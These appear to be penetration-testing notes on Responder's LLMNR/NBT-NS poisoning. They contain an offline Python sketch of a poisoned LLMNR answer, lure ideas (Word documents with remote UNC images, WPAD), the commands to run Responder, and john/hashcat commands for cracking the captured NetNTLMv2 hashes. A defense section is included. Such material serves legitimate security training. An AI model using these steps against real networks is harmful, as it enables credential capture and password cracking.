Responder
Focused on attacks on NTLM Auth and Name Resolution (LLMNR / NBT-NS poisoning)
Windows can get Lonely: when DNS can't resolve a name, the client falls back to LLMNR (multicast) and NBT-NS (broadcast)
Ask neighbors for that name - anyone on the same segment can answer, and the first answer wins
and Authentication - the client then connects to whoever answered and authenticates with NTLM (challenge/response), handing over a NetNTLM hash
Setup and wait for somebody to hit (typo'd share names, stale mapped drives, scripts pointing at decommissioned hosts)
Maybe we'll get hit by a Vulnerability Scanner (w/creds) - a credentialed scan authenticates to every host it discovers, including the poisoned name
Feed Word docs w/ a remote picture/icon whose UNC path points at the fake SMB share - the viewer's machine authenticates just to fetch the image
Setup the 'wpad' proxy plugin (-w), and maybe catch 'auto-proxy' - clients with 'Automatically detect settings' look up the name wpad and will authenticate to the rogue proxy
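The "ask neighbors" exchange above, as an added example that is not Responder's code: a Windows client multicasts a DNS-formatted LLMNR query to 224.0.0.252:5355, and a poisoner unicasts a DNS-formatted answer naming itself. Both messages are built and parsed offline here; the name tacocat, the attacker IP 10.0.0.99 and the transaction ID are made up.

```python
# Added example (not Responder's code): the LLMNR exchange behind "ask neighbors
# for that name", built and parsed offline. Names, IPs and txid are constructed.
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 multicast group used by LLMNR (RFC 4795)
LLMNR_PORT = 5355
QTYPE_A, QTYPE_ANY = 1, 255
FLAG_QR = 0x8000              # response bit in the DNS-style header


def encode_name(name):
    """'tacocat' -> b'\\x07tacocat\\x00' (DNS label encoding, no compression)."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, off):
    """Read a label-encoded name at buf[off:]; return (name, offset after it)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_llmnr_query(name, txid):
    """What the lonely Windows client sends: header with QDCOUNT=1 + one A/IN question."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, 1)


def parse_llmnr_query(pkt):
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if flags & FLAG_QR or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def build_poisoned_answer(query, attacker_ip, ttl=30):
    """What the poisoner sends back: same txid, question echoed, one A record
    pointing at itself. Returns None for query types an A record cannot satisfy."""
    q = parse_llmnr_query(query)
    if q["qtype"] not in (QTYPE_A, QTYPE_ANY) or q["qclass"] != 1:
        return None
    header = struct.pack(">HHHHHH", q["txid"], FLAG_QR, 1, 1, 0, 0)  # ANCOUNT=1
    rr = (encode_name(q["name"]) + struct.pack(">HHIH", QTYPE_A, 1, ttl, 4)
          + socket.inet_aton(attacker_ip))
    return header + q["question"] + rr


def parse_llmnr_answer(pkt):
    """Client side: pull name / IP / TTL out of the answer it is about to trust."""
    txid, flags, _, ancount, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & FLAG_QR or ancount != 1:
        raise ValueError("not a single-answer LLMNR response")
    _, off = decode_name(pkt, 12)          # skip the echoed question name
    off += 4                               # ... and its qtype/qclass
    name, off = decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        raise ValueError("expected an A record")
    return {"txid": txid, "name": name, "ttl": ttl,
            "ip": socket.inet_ntoa(pkt[off:off + rdlen])}


def exchange(name, attacker_ip, txid=0x1234):
    """Run both sides offline; returns what the victim ends up believing."""
    query = build_llmnr_query(name, txid)
    answer = build_poisoned_answer(query, attacker_ip)
    return parse_llmnr_answer(answer)


if __name__ == "__main__":
    # Constructed scenario: victim types \\tacocat, attacker sits at 10.0.0.99.
    print(exchange("tacocat", "10.0.0.99"))
    # On the wire a listener binds 0.0.0.0:5355, joins LLMNR_GROUP with
    # IP_ADD_MEMBERSHIP, and unicasts the answer to the querier's source addr/port.
```

The client only checks that the txid and question match what it sent, so whoever answers fastest on the segment becomes "tacocat"; that is the whole trick, and also why the defenses below are about not asking in the first place.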
Defense:
Disable NBT-NS and LLMNR (GPO "Turn off multicast name resolution" for LLMNR; NetBIOS over TCP/IP per adapter) - the client never asks, so nobody can answer
SMB Signing (required, not merely enabled, on clients and servers) - does not stop the hash being captured, but stops the captured auth being relayed elsewhere
Disable Autodetect Proxy (or publish a real wpad DNS record so the lookup never falls back to LLMNR/NBT-NS)
Private VLANs to isolate clients - poisoning only works inside the broadcast/multicast domain
execute:
> sudo Responder.py -I eth0
Poisoners: LLMNR, NBT-NS, MDNS
Servers: HTTP, HTTPS, SMB, Kerberos, DNS, etc (each one accepts the NTLM auth and logs the hash)
Windows Target:
\\tacocat (a name DNS cannot resolve, typed into Explorer / Run)
Windows announces the LLMNR/NBT-NS request, Responder answers with its own IP, the client authenticates to the fake SMB server, and the NetNTLMv2 challenge/response is captured !!!
bob..1234
hashes (one file per protocol and source IP; each line is user::DOMAIN:challenge:NTProofStr:blob):
cd /opt/responder/logs (Kali package: /usr/share/responder/logs)
cat SMBv2.IP.xxx.txt
john --format=netntlmv2 /opt/responder/logs/SMBv2.IP.xxx.txt
hashcat -m 5600 hash.txt pwlist.txt -o cracked.txt (5600 = NetNTLMv2; use 5500 for NetNTLMv1)
Hot Potato - another method that abuses the same NBT-NS / WPAD behaviour on a single host for local privilege escalation: HotPotato-PrivEscWin